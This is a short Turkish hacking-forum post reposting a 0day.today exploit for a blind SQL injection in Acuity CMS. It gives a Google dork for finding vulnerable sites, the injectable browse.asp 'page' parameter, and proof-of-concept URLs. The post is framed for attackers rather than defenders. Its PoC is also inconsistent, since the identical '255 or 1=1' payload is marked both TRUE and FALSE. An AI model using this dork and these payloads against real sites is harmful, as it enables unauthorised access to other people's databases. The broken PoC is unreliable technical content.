Hoşgeldin Misafir

Acuity CMS Blind SQL Injection Vulnerability

|^KahiN^|

24 Eyl 2020
414 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Acuity CMS Blind SQL Injection Vulnerability

PHP:
Title : Acuity CMS Vulnerable to Blind SQL Injection
Found by : p0pc0rn
Dork  : intext:"Powered by Acuity CMS."
Web   : http://www.acuitycms.com/

SQL Injection
----------------
http://www.site.com/browse.asp?page=[Blind SQL]

POC
----
http://www.site.com/browse.asp?page=255+or+1=1 TRUE
http://www.site.com/browse.asp?page=255+or+1=1 FALSE



#  0day.today [2017-11-14]  #